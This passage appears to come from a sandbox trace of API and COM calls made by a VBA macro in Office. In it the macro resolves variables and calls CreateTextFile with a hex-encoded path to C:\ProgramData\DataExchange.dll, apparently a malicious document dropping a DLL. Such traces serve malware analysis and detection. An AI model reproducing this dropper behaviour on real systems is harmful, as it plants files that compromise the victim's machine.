[2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc988 | out: ppvObject=0x1dc988*=0x0) returned 0x80004002 [0157.559] IUnknown:QueryInterface (in: This=0xa121118, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc980 | out: ppvObject=0x1dc980*=0x0) returned 0x80004002 [0157.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa30c8fc, cbMultiByte=0, lpWideCharStr=0x6702e80, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0157.559] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121118, ppTLib=0x1dc1c0, pIndex=0x0 | out: ppTLib=0x1dc1c0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0157.559] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc1d0, pDummy=0x0 | out: ppTLibAttr=0x1dc1d0, pDummy=0x0) returned 0x0 [0157.559] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0157.560] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.560] ITypeInfo:RemoteGetDllEntry (in: This=0xa121118, memid=1610612738, invkind=1, refPtrFlags=0x1dc1c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0157.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0157.560] strcpy_s (in: _Dst=0x9c54e98, _DstSize=0x9, _Src="VBE7.DLL" | out: _Dst="VBE7.DLL") returned 0x0 [0157.560] ITypeInfo:RemoteGetDllEntry (in: This=0xa121118, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc1c0, pbstrName=0x0, pwOrdinal=0x1dc1e0 | out: pBstrDllName=0x1dc1c0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc1e0*=0xc450) returned 0x0 [0157.560] ITypeInfo:RemoteGetDllEntry (in: This=0xa121118, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc1c0, pwOrdinal=0x500000000) returned 0x0 [0157.560] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x412) returned 0xa2ee3b0 [0157.560] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c55a70 [0157.560] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.560] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.560] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.560] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.560] GetCurrentProcess () returned 0xffffffffffffffff [0157.560] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4b) returned 1 [0157.560] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.560] IUnknown:AddRef (This=0xa02b108) returned 0x4 [0157.560] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc728 | out: ppvObject=0x1dc728*=0x0) returned 0x80004002 [0157.560] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc708, pDummy=0x10 | out: ppTypeAttr=0x1dc708, pDummy=0x10) returned 0x0 [0157.560] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.560] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.560] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.560] IUnknown:Release (This=0xa02b108) returned 0x3 [0157.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e3e, cbMultiByte=6, lpWideCharStr=0x1dc6f0, cchWideChar=7 | out: lpWideCharStr="Ofile") returned 6 [0157.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e3e, cbMultiByte=6, lpWideCharStr=0x1dc730, cchWideChar=7 | out: lpWideCharStr="Ofile") returned 6 [0157.561] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Ofile", lHashVal=0x101982, wFlags=0x8, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e3e, cbMultiByte=6, lpWideCharStr=0x1dc730, cchWideChar=7 | out: lpWideCharStr="Ofile") returned 6 [0157.561] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="Ofile", lHashVal=0x101982, wFlags=0x8, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e3e, cbMultiByte=6, lpWideCharStr=0x1dc730, cchWideChar=7 | out: lpWideCharStr="Ofile") returned 6 [0157.561] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="Ofile", lHashVal=0x101982, wFlags=0x8, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e3e, cbMultiByte=6, lpWideCharStr=0x1dc730, cchWideChar=7 | out: lpWideCharStr="Ofile") returned 6 [0157.561] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="Ofile", lHashVal=0x101982, wFlags=0x8, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.561] IMalloc:Alloc (This=0x7fefecb5380, cb=0xd) returned 0xa2b5e50 [0157.561] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x6, _Src=0x5732e3e | out: _Dst=0xa2b5e50) returned 0x0 [0157.561] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Ofile") returned 0x10ddae [0157.561] strcpy_s (in: _Dst=0x1dc840, _DstSize=0xd, _Src="_B_var_Ofile" | out: _Dst="_B_var_Ofile") returned 0x0 [0157.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=13, lpWideCharStr=0x1dc690, cchWideChar=13 | out: lpWideCharStr="_B_var_Ofile") returned 13 [0157.561] IUnknown:AddRef (This=0x9ab5f00) returned 0x7 [0157.561] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_Ofile", lHashVal=0x10ddae, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.561] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.561] IUnknown:AddRef (This=0x9ab4b50) returned 0x19 [0157.561] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_Ofile", lHashVal=0x10ddae, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.561] IUnknown:Release (This=0x9ab4b50) returned 0x18 [0157.561] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.561] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_Ofile", lHashVal=0x10ddae, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.561] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.561] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.561] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_Ofile", lHashVal=0x10ddae, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.561] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.561] IUnknown:AddRef (This=0x9ab5f00) returned 0x7 [0157.562] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a06c2, cbMultiByte=13, lpWideCharStr=0x1dc6f0, cchWideChar=14 | out: lpWideCharStr="_B_var_Ofile") returned 13 [0157.562] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_Ofile", lHashVal=0x10ddae, wFlags=0x8, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x65006c00000000, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0x0, pDescKind=0x1dc6bc*=0, ppFuncDesc=0x1dc6c0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x65006c00000000, pDummy=0x0) returned 0x0 [0157.562] _mbscpy_s (in: _Dst=0x1dc8b0, _DstSizeInBytes=0x6, _Src=0x5732e3e | out: _Dst=0x1dc8b0) returned 0x0 [0157.562] IMalloc:Realloc (This=0x7fefecb5380, pv=0x99f11a0, cb=0x1000) returned 0x9607a00 [0157.562] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.562] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc0) returned 0x9ca0960 [0157.562] IMalloc:GetSize (This=0x7fefecb5380, pv=0x9ca0960) returned 0xc0 [0157.562] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.562] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.562] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.562] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.562] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.562] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.563] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.563] GetCurrentProcess () returned 0xffffffffffffffff [0157.563] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x5c) returned 1 [0157.563] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.563] _mbscpy_s (in: _Dst=0x1dcb50, _DstSizeInBytes=0x3, _Src=0x5732ec2 | out: _Dst=0x1dcb50) returned 0x0 [0157.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961ed84, cbMultiByte=92, lpWideCharStr=0x67039d6, cchWideChar=186 | out: lpWideCharStr="43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c") returned 92 [0157.563] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x9c55cc0 [0157.563] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa19f3d0, cb=0x400) returned 0xa30caf0 [0157.563] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.563] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.563] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.563] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.563] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.563] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.563] GetCurrentProcess () returned 0xffffffffffffffff [0157.563] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.563] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.563] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6780000 [0157.564] IUnknown:AddRef (This=0xa02b058) returned 0x2 [0157.564] IUnknown:Release (This=0xa02b058) returned 0x1 [0157.565] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0157.565] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.565] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.565] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0157.565] GetCurrentProcess () returned 0xffffffffffffffff [0157.565] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x54) returned 1 [0157.565] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0157.565] IUnknown:AddRef (This=0xa02b108) returned 0x4 [0157.565] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc728 | out: ppvObject=0x1dc728*=0x0) returned 0x80004002 [0157.565] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc708, pDummy=0x10 | out: ppTypeAttr=0x1dc708, pDummy=0x10) returned 0x0 [0157.565] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.565] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.565] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.565] IUnknown:Release (This=0xa02b108) returned 0x3 [0157.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732ee6, cbMultiByte=4, lpWideCharStr=0x1dc6f0, cchWideChar=5 | out: lpWideCharStr="lkd") returned 4 [0157.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732ee6, cbMultiByte=4, lpWideCharStr=0x1dc730, cchWideChar=5 | out: lpWideCharStr="lkd") returned 4 [0157.565] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="lkd", lHashVal=0x10aecd, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732ee6, cbMultiByte=4, lpWideCharStr=0x1dc730, cchWideChar=5 | out: lpWideCharStr="lkd") returned 4 [0157.565] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="lkd", lHashVal=0x10aecd, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732ee6, cbMultiByte=4, lpWideCharStr=0x1dc730, cchWideChar=5 | out: lpWideCharStr="lkd") returned 4 [0157.566] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="lkd", lHashVal=0x10aecd, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732ee6, cbMultiByte=4, lpWideCharStr=0x1dc730, cchWideChar=5 | out: lpWideCharStr="lkd") returned 4 [0157.566] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="lkd", lHashVal=0x10aecd, wFlags=0x5, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.566] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0xa2b5e50 [0157.566] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x4, _Src=0x5732ee6 | out: _Dst=0xa2b5e50) returned 0x0 [0157.566] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lkd") returned 0x106bde [0157.566] strcpy_s (in: _Dst=0x1dc840, _DstSize=0xb, _Src="_B_var_lkd" | out: _Dst="_B_var_lkd") returned 0x0 [0157.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=11, lpWideCharStr=0x1dc690, cchWideChar=11 | out: lpWideCharStr="_B_var_lkd") returned 11 [0157.566] IUnknown:AddRef (This=0x9ab5f00) returned 0x7 [0157.566] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_lkd", lHashVal=0x106bde, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.566] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.566] IUnknown:AddRef (This=0x9ab4b50) returned 0x19 [0157.566] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_lkd", lHashVal=0x106bde, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.566] IUnknown:Release (This=0x9ab4b50) returned 0x18 [0157.566] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.566] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_lkd", lHashVal=0x106bde, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.566] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.566] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.566] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_lkd", lHashVal=0x106bde, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.566] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.566] IUnknown:AddRef (This=0x9ab5f00) returned 0x7 [0157.566] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a06f2, cbMultiByte=11, lpWideCharStr=0x1dc6f0, cchWideChar=12 | out: lpWideCharStr="_B_var_lkd") returned 11 [0157.566] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_lkd", lHashVal=0x106bde, wFlags=0x5, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0x0, pDescKind=0x1dc6bc*=0, ppFuncDesc=0x1dc6c0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.567] _mbscpy_s (in: _Dst=0x1dc8b0, _DstSizeInBytes=0x4, _Src=0x5732ee6 | out: _Dst=0x1dc8b0) returned 0x0 [0157.567] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f5e, cbMultiByte=16, lpWideCharStr=0x1dc550, cchWideChar=15 | out: lpWideCharStr="CreateTextFile") returned 0 [0157.567] wcscpy_s (in: _Destination=0x9c55e50, _SizeInWords=0xf, _Source="CreateTextFile" | out: _Destination="CreateTextFile") returned 0x0 [0157.567] IUnknown:AddRef (This=0xa02b108) returned 0x4 [0157.567] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc728 | out: ppvObject=0x1dc728*=0x0) returned 0x80004002 [0157.567] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc708, pDummy=0x10 | out: ppTypeAttr=0x1dc708, pDummy=0x10) returned 0x0 [0157.567] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0157.567] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0157.567] IUnknown:Release (This=0xa02b108) returned 0x4 [0157.567] IUnknown:Release (This=0xa02b108) returned 0x3 [0157.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f36, cbMultiByte=6, lpWideCharStr=0x1dc6f0, cchWideChar=7 | out: lpWideCharStr="WText") returned 6 [0157.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f36, cbMultiByte=6, lpWideCharStr=0x1dc730, cchWideChar=7 | out: lpWideCharStr="WText") returned 6 [0157.567] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="WText", lHashVal=0x10d2e8, wFlags=0x8, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f36, cbMultiByte=6, lpWideCharStr=0x1dc730, cchWideChar=7 | out: lpWideCharStr="WText") returned 6 [0157.567] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="WText", lHashVal=0x10d2e8, wFlags=0x8, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f36, cbMultiByte=6, lpWideCharStr=0x1dc730, cchWideChar=7 | out: lpWideCharStr="WText") returned 6 [0157.567] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="WText", lHashVal=0x10d2e8, wFlags=0x8, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f36, cbMultiByte=6, lpWideCharStr=0x1dc730, cchWideChar=7 | out: lpWideCharStr="WText") returned 6 [0157.568] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="WText", lHashVal=0x10d2e8, wFlags=0x8, ppTInfo=0x1dc6e8, pDescKind=0x1dc6fc, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc6e8*=0x0, pDescKind=0x1dc6fc*=0, ppFuncDesc=0x1dc700, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0157.568] IMalloc:Alloc (This=0x7fefecb5380, cb=0xd) returned 0xa2b5e50 [0157.568] _mbscpy_s (in: _Dst=0xa2b5e50, _DstSizeInBytes=0x6, _Src=0x5732f36 | out: _Dst=0xa2b5e50) returned 0x0 [0157.568] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WText") returned 0x1096d5 [0157.568] strcpy_s (in: _Dst=0x1dc840, _DstSize=0xd, _Src="_B_var_WText" | out: _Dst="_B_var_WText") returned 0x0 [0157.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc840, cbMultiByte=13, lpWideCharStr=0x1dc690, cchWideChar=13 | out: lpWideCharStr="_B_var_WText") returned 13 [0157.568] IUnknown:AddRef (This=0x9ab5f00) returned 0x7 [0157.568] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_WText", lHashVal=0x1096d5, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.568] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.568] IUnknown:AddRef (This=0x9ab4b50) returned 0x19 [0157.568] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_WText", lHashVal=0x1096d5, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.568] IUnknown:Release (This=0x9ab4b50) returned 0x18 [0157.568] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0157.568] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_WText", lHashVal=0x1096d5, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.568] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0157.568] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0157.568] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_WText", lHashVal=0x1096d5, pfName=0x1dc760, pBstrLibName=0x1dc690 | out: pfName=0x1dc760*=0, pBstrLibName=0x1dc690) returned 0x0 [0157.568] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0157.568] IUnknown:AddRef (This=0x9ab5f00) returned 0x7 [0157.568] IUnknown:Release (This=0x9ab5f00) returned 0x6 [0157.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a071e, cbMultiByte=13, lpWideCharStr=0x1dc6f0, cchWideChar=14 | out: lpWideCharStr="_B_var_WText") returned 13 [0157.568] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_WText", lHashVal=0x1096d5, wFlags=0x8, ppTInfo=0x1dc6a8, pDescKind=0x1dc6bc, ppFuncDesc=0x1dc6c0, ppVarDesc=0x57005f00720061, ppTypeComp=0x74007800000000, pDummy=0x0 | out: ppTInfo=0x1dc6a8*=0x0, pDescKind=0x1dc6bc*=0, ppFuncDesc=0x1dc6c0, ppVarDesc=0x57005f00720061, ppTypeComp=0x74007800000000, pDummy=0x0) returned 0x0 [0157.568] _mbscpy_s (in: _Dst=0x1dc8b0, _DstSizeInBytes=0x6, _Src=0x5732f36 | out: _Dst=0x1dc8b0) returned 0x0 [0157.568] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b5e50) [0157.569] 